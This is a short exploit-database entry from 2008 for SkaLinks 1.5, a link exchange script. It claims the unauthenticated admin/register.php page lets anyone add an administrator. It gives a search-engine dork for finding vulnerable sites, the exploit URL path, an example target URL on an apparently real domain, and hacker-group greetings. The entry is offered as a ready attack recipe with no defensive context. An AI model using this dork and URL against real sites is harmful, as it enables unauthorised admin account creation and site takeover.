id: 3658
date: 09/11/2008
title: SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability
author: mr.al7rbi
cves: 

=====================================================================
SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability
=====================================================================


Title:   SkaLinks - Link Exchange Script
d0rk: 2005. Powered by SkaLinks - Link Exchange Script
DESCRIPTION:
add admin
EXPLOITS:
http://example.com/admin/register.php
example:
http://xxx.dk/partner/admin/register.php

Greetz : noaf_07 & aloosh  &  ili The General ili & fhad & all tryag members & all muslims



#  0day.today [2023-03-25]  #